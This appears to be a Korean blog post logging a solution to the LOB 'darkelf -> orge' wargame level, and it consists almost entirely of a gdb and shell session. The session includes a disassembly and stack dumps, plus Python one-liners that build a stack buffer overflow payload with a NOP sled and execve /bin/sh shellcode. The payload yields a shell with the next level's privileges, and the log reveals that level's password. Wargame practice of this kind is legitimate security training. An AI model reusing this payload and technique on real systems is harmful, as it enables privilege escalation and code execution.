0x8048529 <main+41>: call 0x80483f0 <strlen>
0x804852e <main+46>: add $0x4,%esp
0x8048531 <main+49>: mov %eax,%eax
0x8048533 <main+51>: cmp $0x4d,%eax
0x8048536 <main+54>: je 0x8048550 <main+80>
0x8048538 <main+56>: push $0x804869c
0x804853d <main+61>: call 0x8048410 <printf>
0x8048542 <main+66>: add $0x4,%esp
0x8048545 <main+69>: push $0x0
0x8048547 <main+71>: call 0x8048420 <exit>
0x804854c <main+76>: add $0x4,%esp
0x804854f <main+79>: nop
0x8048550 <main+80>: nop
0x8048551 <main+81>: movl $0x0,0xffffffd4(%ebp)
0x8048558 <main+88>: mov 0xffffffd4(%ebp),%eax
0x804855b <main+91>: lea 0x0(,%eax,4),%edx
0x8048562 <main+98>: mov 0x80497d4,%eax
0x8048567 <main+103>: cmpl $0x0,(%eax,%edx,1)
0x804856b <main+107>: jne 0x8048570 <main+112>
0x804856d <main+109>: jmp 0x80485b0 <main+176>
0x804856f <main+111>: nop
0x8048570 <main+112>: mov 0xffffffd4(%ebp),%eax
0x8048573 <main+115>: lea 0x0(,%eax,4),%edx
0x804857a <main+122>: mov 0x80497d4,%eax
0x804857f <main+127>: mov (%eax,%edx,1),%edx
0x8048582 <main+130>: push %edx
0x8048583 <main+131>: call 0x80483f0 <strlen>
0x8048588 <main+136>: add $0x4,%esp
0x804858b <main+139>: mov %eax,%eax
0x804858d <main+141>: push %eax
0x804858e <main+142>: push $0x0
0x8048590 <main+144>: mov 0xffffffd4(%ebp),%eax
0x8048593 <main+147>: lea 0x0(,%eax,4),%edx
0x804859a <main+154>: mov 0x80497d4,%eax
0x804859f <main+159>: mov (%eax,%edx,1),%edx
0x80485a2 <main+162>: push %edx
---Type <return> to continue, or q <return> to quit---
0x80485a3 <main+163>: call 0x8048430 <memset>
0x80485a8 <main+168>: add $0xc,%esp
0x80485ab <main+171>: incl 0xffffffd4(%ebp)
0x80485ae <main+174>: jmp 0x8048558 <main+88>
0x80485b0 <main+176>: mov 0xc(%ebp),%eax
0x80485b3 <main+179>: add $0x4,%eax
0x80485b6 <main+182>: mov (%eax),%edx
0x80485b8 <main+184>: add $0x2f,%edx
0x80485bb <main+187>: cmpb $0xbf,(%edx)
0x80485be <main+190>: je 0x80485d7 <main+215>
0x80485c0 <main+192>: push $0x80486ab
0x80485c5 <main+197>: call 0x8048410 <printf>
0x80485ca <main+202>: add $0x4,%esp
0x80485cd <main+205>: push $0x0
0x80485cf <main+207>: call 0x8048420 <exit>
0x80485d4 <main+212>: add $0x4,%esp
0x80485d7 <main+215>: mov 0xc(%ebp),%eax
0x80485da <main+218>: add $0x4,%eax
0x80485dd <main+221>: mov (%eax),%edx
0x80485df <main+223>: push %edx
0x80485e0 <main+224>: call 0x80483f0 <strlen>
0x80485e5 <main+229>: add $0x4,%esp
0x80485e8 <main+232>: mov %eax,%eax
0x80485ea <main+234>: cmp $0x30,%eax
0x80485ed <main+237>: jbe 0x8048606 <main+262>
0x80485ef <main+239>: push $0x80486c8
0x80485f4 <main+244>: call 0x8048410 <printf>
0x80485f9 <main+249>: add $0x4,%esp
0x80485fc <main+252>: push $0x0
0x80485fe <main+254>: call 0x8048420 <exit>
0x8048603 <main+259>: add $0x4,%esp
0x8048606 <main+262>: mov 0xc(%ebp),%eax
0x8048609 <main+265>: add $0x4,%eax
0x804860c <main+268>: mov (%eax),%edx
0x804860e <main+270>: push %edx
0x804860f <main+271>: lea 0xffffffd8(%ebp),%eax
0x8048612 <main+274>: push %eax
0x8048613 <main+275>: call 0x8048440 <strcpy>
0x8048618 <main+280>: add $0x8,%esp
0x804861b <main+283>: lea 0xffffffd8(%ebp),%eax
0x804861e <main+286>: push %eax
0x804861f <main+287>: push $0x80486df
0x8048624 <main+292>: call 0x8048410 <printf>
0x8048629 <main+297>: add $0x8,%esp
0x804862c <main+300>: push $0x28
0x804862e <main+302>: push $0x0
0x8048630 <main+304>: lea 0xffffffd8(%ebp),%eax
0x8048633 <main+307>: push %eax
0x8048634 <main+308>: call 0x8048430 <memset>
0x8048639 <main+313>: add $0xc,%esp
0x804863c <main+316>: leave
---Type <return> to continue, or q <return> to quit---
0x804863d <main+317>: ret
0x804863e <main+318>: nop
0x804863f <main+319>: nop
End of assembler dump.
(gdb) b *main+317
Breakpoint 1 at 0x804863d
(gdb) r aaaa
Starting program: /home/darkelf/tmp///////////////////////////////////////////////////////orge aaaa
argv[0] error
Program exited normally.
(gdb) Quit
(gdb) q
[darkelf@localhost tmp]$ ls
orge test test.c
[darkelf@localhost tmp]$ vi test.c
[darkelf@localhost tmp]$ gcc -o test test.c
[darkelf@localhost tmp]$ ./test
76[darkelf@localhost tmp]$ gdb -q /home/darkelf/tmp////////////////////////////////////////////////////////orge
(gdb) b *main+317
Breakpoint 1 at 0x804863d
(gdb) r aaa
Starting program: /home/darkelf/tmp////////////////////////////////////////////////////////orge aaa
stack is still your friend.
Program exited normally.
(gdb) `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Undefined command: "". Try "help".
(gdb) r `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
Starting program: /home/darkelf/tmp////////////////////////////////////////////////////////orge `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿lý¿¿
Breakpoint 1, 0x804863d in main ()
(gdb) x/100x $esp
0xbffff96c: 0xbfbffd6c 0x00000000 0xbffff9b4 0xbffff9c4
0xbffff97c: 0x40013868 0x00000003 0x08048450 0x00000000
0xbffff98c: 0x08048471 0x08048500 0x00000003 0xbffff9b4
0xbffff99c: 0x08048390 0x0804866c 0x4000ae60 0xbffff9ac
0xbffff9ac: 0x40013e90 0x00000003 0xbffffaaa 0xbffffaf8
0xbffff9bc: 0xbffffb29 0x00000000 0xbffffc6e 0xbffffc90
0xbffff9cc: 0xbffffc9a 0xbffffca8 0xbffffcc7 0xbffffcd7
0xbffff9dc: 0xbffffcee 0xbffffd0b 0xbffffd16 0xbffffd24
0xbffff9ec: 0xbffffd67 0xbffffd7a 0xbffffd8f 0xbffffd9f
0xbffff9fc: 0xbffffdac 0xbffffdcb 0xbffffdd6 0xbffffde3
0xbffffa0c: 0xbffffdeb 0x00000000 0x00000003 0x08048034
0xbffffa1c: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffa2c: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffffa3c: 0x00000008 0x00000000 0x00000009 0x08048450
0xbffffa4c: 0x0000000b 0x000001fa 0x0000000c 0x000001fa
0xbffffa5c: 0x0000000d 0x000001fa 0x0000000e 0x000001fa
0xbffffa6c: 0x00000010 0x0febfbff 0x0000000f 0xbffffaa5
0xbffffa7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa9c: 0x00000000 0x00000000 0x38366900 0x682f0036
0xbffffaac: 0x2f656d6f 0x6b726164 0x2f666c65 0x2f706d74
0xbffffabc: 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f
0xbffffacc: 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f
0xbffffadc: 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f
0xbffffaec: 0x2f2f2f2f 0x6f2f2f2f 0x00656772 0xbfbfbfbf
(gdb)
0xbffffafc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffb0c: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffb1c: 0xbfbfbfbf 0xbfbfbfbf 0xbfbffd6c 0x90909000
0xbffffb2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb4c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb5c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb6c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb7c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb8c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb9c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbbc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbcc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbdc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbec: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbfc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc0c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc4c: 0x90909090 0x90909090 0x50c03190 0x732f2f68
0xbffffc5c: 0x622f6868 0xe3896e69 0xe1895350 0xcd0bb099
0xbffffc6c: 0x00000080 0x00000000 0x00000000 0x00000000
0xbffffc7c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) Quit
(gdb) q
The program is running. Exit anyway? (y or n) y
[darkelf@localhost tmp]$ ./home/darkelf/tmp/////////////////////////////////////
bash: ./home/darkelf/tmp///////////////////////////////////////////////////////o
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
stack is still your friend.
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
argv error
[darkelf@localhost tmp]$ .//////////////////////////////////////////////////////
argv error
[darkelf@localhost tmp]$ .////////////////////////////////////////////////////// //////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x e3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œû
Illegal instruction (core dumped)
[darkelf@localhost tmp]$ bash2
[darkelf@localhost tmp]$ `python -c 'print "\xbf"*44+"\x6c\xfd\xbf\xbf"'` `pytho n -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89 \xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
bash2: ¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿lý¿¿: command not found
[darkelf@localhost tmp]$
[darkelf@localhost tmp]$ .////////////////////////////////////////////////////// //////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `python -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\x e3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œûÿ¿
bash$ id
uid=506(darkelf) gid=506(darkelf) groups=506(darkelf)
bash$ exit
exit
[darkelf@localhost tmp]$ cd ../
[darkelf@localhost darkelf]$ .////////////////////////////////////////////////// //////////////////////orge `python -c 'print "\xbf"*44+"\x8c\xfb\xff\xbf"'` `pyt hon -c 'print "\x90"*300+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x 89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Œûÿ¿
bash$
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darke lf)
bash$ whoami
orge
bash$ my-pass
euid = 507
timewalker
bash$
bash$
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| troll -> vampire (0) | 2014.02.20 |
|---|---|
| orge -> troll (0) | 2014.02.20 |
| wolfman -> darkelf (0) | 2014.02.20 |
| orc -> wolfman (0) | 2014.02.20 |
| gremlin -> cobolt (0) | 2014.02.20 |
